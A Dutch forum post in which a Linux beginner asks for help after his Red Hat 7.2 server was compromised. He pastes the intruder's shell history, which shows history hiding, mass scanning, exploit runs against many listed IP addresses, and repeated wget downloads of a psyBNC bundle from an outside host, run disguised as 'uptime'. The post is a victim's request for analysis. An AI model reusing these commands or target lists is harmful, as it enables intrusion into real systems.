Ik ben toen net gehacked. het is dat ik net inlog en ik zie dat er een half uur geleden was ingelogt.
Ik gebruik Redhat 7.2 log in via ssh en putty.
Ik zou graag willen weten wat er is gebeurd omdat ik linux beginner ben.
ik heb de log en daar staat alles in wat er gedaan is.
Verder is de server nu alleen nog voor i-net deling en webserver dus niet echt iets bijzonders.
Dus ik zou graag willen weten:
Wat is er gebeurd (volgens mij zijn er poorten open gezet.)
Hoe ik dit kan voorkomen.
of ik een nieuwe installatie linux moet doen..
bvd.
edit. ik heb al op i-net gekeken wat dat psy is wat ze hebben uitgepakt alleen kan daar nog niet veel over vinden.
Ik gebruik Redhat 7.2 log in via ssh en putty.
Ik zou graag willen weten wat er is gebeurd omdat ik linux beginner ben.
ik heb de log en daar staat alles in wat er gedaan is.
Verder is de server nu alleen nog voor i-net deling en webserver dus niet echt iets bijzonders.
Dus ik zou graag willen weten:
Wat is er gebeurd (volgens mij zijn er poorten open gezet.)
Hoe ik dit kan voorkomen.
of ik een nieuwe installatie linux moet doen..
bvd.
edit. ik heb al op i-net gekeken wat dat psy is wat ze hebben uitgepakt alleen kan daar nog niet veel over vinden.
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
| unset HISFTILE cd /dev/rd/cdb cd .m2 ./cnxver mass.log ls ./cnxver mass.log exit cd /dev/rd/cdb cd .m2 ./op 0x09 196.44.35.67 ./op 0x09 196.44.35.67 -c 21 [root@SERVER .m2]# 0x09 196.1.100.217 ./op 0x09 196.1.100.217 ./op 0x07 196.2.43.173 cvb ./op 0x13 196.7.54.37 ./op 0x01 196.44.192.178 ./op 0x01 196.44.192.178 -c 21 ./op 0x07 196.44.193.34 ./op 0x07 196.44.193.34 -c 21 cd /dev/rd/cdb cd .m2 ./cnxver mass.log unset HISTFLE cd /dev/rd/cdb cd .m2 ./cnxver mass.log exit unset HISFTILE cd /dev/rd/cdb cd .m2 ./cnxscan --sockets 400 210.*.*.* --background cat mass.pid kill -9 1445 ./cnxver mass.log ./cnxscan --sockets 400 210.*.*.* --background exit exit cd /dev/rd/cdb cd .m2 ./cnxver mass.log ./op 0x01 210.11.58.29 ./op 0x01 210.11.58.29 -c 21 cd /dev/rd/cdb cd .m2 ./cnxver mass.log 210.19.204.58wget oxigenatu.com/psy.tgz 210.19.204.58 wget oxigenatu.com/psy.tgz wget oxigenatu.com/psy.tgz tar zxvf psy.tgz cd psybnc ./uptime psybnc/src/p_log.c cd src/p_log.c cd p_log.c cd p_log ps ax cd /dev/rd/cdb cd .m2 ./op 0x07 196.44.193.34 -c 21 ct ./op 0x07 210.19.204.58 ./op 0x01 210.9.195.40 ./op 0x01 210.9.195.40 -c 21 ./op 0x09 210.9.134.102 ./op 0x09 210.9.134.101 ./op 0x01 210.20.148.97 ./op 0x01 210.20.148.97 -c 21 ./op 0x07 210.19.204.58 ./op 0x07 210.19.204.58 -c 21 cd /var/tmp wget oxigenatu.com/psy.tgz tar zxvf psy.tgz cd psybnc ./uptime fistfile histfile ./uptime ps ax ./op 0x06 210.19.108.9 nbm ./op 0x06 210.19.108.9 ./op 0x06 210.19.108.9 cd /dev/rd/cdb cd .m2 ./cnxver mass.log cd /dev/rd/cdb cd .m2 ./op 0x11 210.0.142.141 ./op 0x09 210.0.142.151 ./op 0x09 210.0.143.138 ./op 0x09 210.0.154.36 ./op 0x09 210.0.154.36 -c 21 ./uptime cd psybnc ./uptime cd cd ./op 0x09 210.0.163.235 ./op cd /var/tmp wget oxigenatu.com/psy.tgz tar zxvf psy.tgz cd psybnc ./uptime ging to log/psybnc.log cd cd ./op 0x07 210.0.200.89 ./op 0x07 210.0.200.89 ./op 0x07 210.0.200.89 ./op 0x07 210.0.200.89 ./op 0x07 210.0.200.89 cd /dev/rd/cdb cd .m2 ./op 0x07 210.0.200.89 ./op 0x13 210.17.139.26 ./op 0x07 210.17.135.205 ./op 0x07 210.17.135.203 ./op 0x07 210.17.135.202 ./op 210.17.133.243 ./op 210.17.133.243 -c 21 ./op 0x06 210.17.133.243 ./op 0x09 210.17.128.94 ./op 0x07 210.16.36.253 unsethistfile histfile ./op 0x07 210.16.20.10 tar zxvf psy.tgz cd psybnc ./uptime cd /dev/rd/cdb cd ./m2 cd .m2 ./cnxver mass.log ./uptime ./op 0x07 210.16.20.10 -c 21 cd /dev/rd/cdb cd .m2 ./op 0x07 210.16.20.10 -c 21 ./uptime tar zxvf psy.tgz cd psybnc ./uptime cd /dev/rd/cdb cd .m2 ./cnxver mass.log cd psybnc ./uptime cd /cd /dev/rd/cdb cd /dev/rd/cdb cd .m2 ./op 0x09 210.10.43.193 ./op 0x09 210.10.43.193 -c 21 tar zxvf psy.tgz cd psybnc ./uptime cd /dev/rd/cdb cd .m2 ./cnxver mass.log cd /dev/rd/cdb/ cd .m2 /cnxver mass.log /cnxver mass.log ./cnxver mass.log andrake 8.2 (apache-1.3.23-4) 210.23.230.169 : 0x06 - RedHat 7.1 (apache-1.3.19-5) 210.24.152.36 : 0x08 - RedHat 7.2 (apache 1.3.26-src) 210.24.152.41 : 0x08 - RedHat 7.2 (apache 1.3.26-src) 210.24.152.37 : 0x08 - RedHat 7.2 (apache 1.3.26-src) 210.24.152.34 : 0x08 - RedHat 7.2 (apache 1.3.26-src) 210.24.152.51 : 0x08 - RedHat 7.2 (apache 1.3.26-src) 210.24.152.50 : 0x08 - RedHat 7.2 (apache 1.3.26-src) 210.24.152.54 : 0x08 - RedHat 7.2 (apache 1.3.26-src) 210.24.152.53 : 0x08 - RedHat 7.2 (apache 1.3.26-src) 210.24.152.55 : 0x08 - RedHat 7.2 (apache 1.3.26-src) 210.24.152.52 : 0x08 - RedHat 7.2 (apache 1.3.26-src) 210.24.152.40 : 0x08 - RedHat 7.2 (apache 1.3.26-src) 210.24.244.155 : 0x05 - RedHat 7.0 (apache-1.3.12-25) (it could 6.2 too) 210.30.17.16 : 0x01 - Debian 3.0 (Woody) - apache-1.3.26-1 210.31.120.11 : 0x07 - RedHat 7.2 (apache-1.3.20-16) 210.32.131.2 : 0x05 - RedHat 7.0 (apache-1.3.12-25) (it could 6.2 too) 210.34.192.80 : 0x09 - RedHat 7.3 (apache-1.3.23-11) 210.35.2.5 : 0x09 - RedHat 7.3 (apache-1.3.23-11) 210.35.2.3 : 0x09 - RedHat 7.3 (apache-1.3.23-11; cd /dev/rd/cdb/ cd .m2 ./cnxscan --sockets 40 210.12.63.72 ./cnxver mass.log cd /dev/rd/cdb/ cd m2 cd .m2 ./cnxver mass.log ./cnxver mass.log cd /dev/rd/cdb/ cd .m2 .cnx mass.log .cnxver mass.log .cnxver mass.log ./cnxver mass.log ./op 0x09 210.15.235.9 cd /dev/rd/cdb/ cd .m2 ./op 0x11 210.23.9.66 ./op 0x11 210.23.9.66 -c 21 ./op 0x11 210.23.9.67 ./op 0x13 210.23.9.103 ./op 0x13 210.23.9.103 -c 21 cd /var/tmp wget oxigenatu.com/psy.tgz tar zxvf psy.tgz cd psybnc ./uptime ./uptime cd psybnc.log cd /dev/rd/cdb/ cd .m2 ./op 0x13 210.23.9.102 ./op 0x13 210.23.9.102 -c 21 cd /var/tmp wget oxigenatu.com/psy.tgz tar zxvf psy.tgz cd psybnc ./uptime cd dev/rd/cdb/ cd dev/rd/cdb cd /dev/rd/cdb cd .m2 ./cnxver mass.log cd /deb/rd/cdb/ cd /deb/rd/cdb cd /dev/rd/cdb cd .m2 ./op 0x06 210.23.230.169 ./op 0x06 210.23.230.169 -c 21 wget oxigenatu.com/psy.tgz tar zxvf psy.tgz cd psybnc ./uptime cd /dev/rd/cdb/ cd .m2 ./op 0x09 210.23.146.211 ./op 0x09 210.23.146.210 ./op 0x09 210.23.146.212 ./op 0x01 210.23.138.169 ./op 0x01 210.23.136.24 ./op 0x06 210.23.126.198 |
Hieronder had ik iets leuks kunnen neerzetten... Maar waarom mensen hiermee vervelen....